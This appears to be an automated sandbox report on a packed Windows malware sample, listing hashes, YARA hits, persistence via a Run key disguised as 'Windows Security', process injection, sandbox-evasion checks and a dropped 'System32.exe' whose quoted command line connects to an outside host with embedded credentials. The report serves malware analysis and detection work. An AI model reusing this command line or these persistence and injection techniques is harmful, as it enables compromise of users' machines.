Analysis
-
max time kernel
140s -
max time network
182s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
01-12-2022 07:41
Static task
static1
Behavioral task
behavioral1
Sample
8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe
Resource
win10v2004-20220901-en
General
-
Target
8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe
-
Size
1.4MB
-
MD5
c9ddc48f08e3678e2a4e65d4951dc261
-
SHA1
7b2e70ecdf86e9461f0cb4e6aeb37cae893bcfa5
-
SHA256
8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4
-
SHA512
cfa8b15fa6df43f47a63085382f18c8f2a9f170781c54c52f4ca584924c601f7664ea113ee2b103fd3e288179cc709b0fee1830c9cea868400c28c32fbb43825
-
SSDEEP
24576:jxdW2AUOoj6Rc4FoweN2vtUm5a4j06/b9y8lDbe+Eltpe3f:dZA4BEoZsh5ayFy8lU6f
Malware Config
Signatures
-
ACProtect 1.3x - 1.4x DLL software 4 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral1/files/0x00090000000139eb-75.dat acprotect behavioral1/files/0x0008000000013a17-78.dat acprotect behavioral1/files/0x0008000000013a17-77.dat acprotect behavioral1/files/0x00090000000139eb-76.dat acprotect -
Executes dropped EXE 1 IoCs
pid Process 588 System32.exe -
resource yara_rule behavioral1/files/0x0006000000014145-70.dat upx behavioral1/files/0x0006000000014145-71.dat upx behavioral1/files/0x0006000000014145-73.dat upx behavioral1/files/0x00090000000139eb-75.dat upx behavioral1/files/0x0008000000013a17-78.dat upx behavioral1/files/0x0008000000013a17-77.dat upx behavioral1/files/0x00090000000139eb-76.dat upx behavioral1/memory/588-80-0x0000000013900000-0x000000001394B000-memory.dmp upx behavioral1/memory/588-81-0x0000000011000000-0x00000000110F4000-memory.dmp upx behavioral1/memory/588-82-0x0000000000400000-0x000000000040F000-memory.dmp upx behavioral1/memory/588-83-0x0000000011000000-0x00000000110F4000-memory.dmp upx -
Loads dropped DLL 4 IoCs
pid Process 1236 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe 1236 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe 588 System32.exe 588 System32.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Security = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe\"" 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1440 set thread context of 1236 1440 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe 28 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 System32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz System32.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 1440 wrote to memory of 1236 1440 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe 28 PID 1440 wrote to memory of 1236 1440 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe 28 PID 1440 wrote to memory of 1236 1440 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe 28 PID 1440 wrote to memory of 1236 1440 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe 28 PID 1440 wrote to memory of 1236 1440 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe 28 PID 1440 wrote to memory of 1236 1440 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe 28 PID 1440 wrote to memory of 1236 1440 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe 28 PID 1440 wrote to memory of 1236 1440 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe 28 PID 1440 wrote to memory of 1236 1440 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe 28 PID 1440 wrote to memory of 1236 1440 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe 28 PID 1440 wrote to memory of 1236 1440 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe 28 PID 1236 wrote to memory of 588 1236 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe 29 PID 1236 wrote to memory of 588 1236 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe 29 PID 1236 wrote to memory of 588 1236 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe 29 PID 1236 wrote to memory of 588 1236 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe 29
Processes
-
C:\Users\Admin\AppData\Local\Temp\8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe"C:\Users\Admin\AppData\Local\Temp\8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe"1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Users\Admin\AppData\Local\Temp\8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe"C:\Users\Admin\AppData\Local\Temp\8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Users\Admin\AppData\Roaming\Security\System32.exeC:\Users\Admin\AppData\Roaming\Security\System32.exe -o http://H4x0r_djred2:[email protected]:83443⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:588
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
14KB
MD59922477bc8d154d7c1d9528e03325d0b
SHA1ff4401fed76657a2325485eabccfbbae9156cb7f
SHA256a0b3de75033b8ede8661b316a0baf6ab5899afb9515a9d525e914be35c440d91
SHA51258266baa6bb223769f88eff1709abb0fef5911bfd6a58d09cac56952a5829a763616682e674f7c12a15d692f794ce89eb0e5174a33d1a9e5d4b6cf41a83098a5
-
Filesize
74KB
MD593f6d0122c2b13a55ec467549429b5c8
SHA13f1e2101831d8b812c92bb03b7de0a2b47314c21
SHA256a11b09086205010e41ee0e938539b7fdbc132f73e85ed54df1016dee4f8793a0
SHA512aeef696afa62cf4c61372868f31f0706110de6f57faf5fa8990aa26b9f236405f7aee22511425009280ca861afeeda84a90a3c180a9e3eea3309a1830badd055
-
Filesize
328KB
MD55cce96ba11c1492b7ce00030d98021de
SHA194054638dea3711cf28de3ec9d9b8fe4a54aef80
SHA2564453e1939e32ea39c70b7b61265fa990dfc27e054838a0a559d4c86249af11b9
SHA51235dadeea5171e62b5b7cb6b0bff9b83ebb830f5d9453444513295b4e56f3d3e25abb15ef45015b000d0477754268e45e56230d15f417f12fc0f89002f3cb4652
-
Filesize
14KB
MD59922477bc8d154d7c1d9528e03325d0b
SHA1ff4401fed76657a2325485eabccfbbae9156cb7f
SHA256a0b3de75033b8ede8661b316a0baf6ab5899afb9515a9d525e914be35c440d91
SHA51258266baa6bb223769f88eff1709abb0fef5911bfd6a58d09cac56952a5829a763616682e674f7c12a15d692f794ce89eb0e5174a33d1a9e5d4b6cf41a83098a5
-
Filesize
14KB
MD59922477bc8d154d7c1d9528e03325d0b
SHA1ff4401fed76657a2325485eabccfbbae9156cb7f
SHA256a0b3de75033b8ede8661b316a0baf6ab5899afb9515a9d525e914be35c440d91
SHA51258266baa6bb223769f88eff1709abb0fef5911bfd6a58d09cac56952a5829a763616682e674f7c12a15d692f794ce89eb0e5174a33d1a9e5d4b6cf41a83098a5
-
Filesize
74KB
MD593f6d0122c2b13a55ec467549429b5c8
SHA13f1e2101831d8b812c92bb03b7de0a2b47314c21
SHA256a11b09086205010e41ee0e938539b7fdbc132f73e85ed54df1016dee4f8793a0
SHA512aeef696afa62cf4c61372868f31f0706110de6f57faf5fa8990aa26b9f236405f7aee22511425009280ca861afeeda84a90a3c180a9e3eea3309a1830badd055
-
Filesize
328KB
MD55cce96ba11c1492b7ce00030d98021de
SHA194054638dea3711cf28de3ec9d9b8fe4a54aef80
SHA2564453e1939e32ea39c70b7b61265fa990dfc27e054838a0a559d4c86249af11b9
SHA51235dadeea5171e62b5b7cb6b0bff9b83ebb830f5d9453444513295b4e56f3d3e25abb15ef45015b000d0477754268e45e56230d15f417f12fc0f89002f3cb4652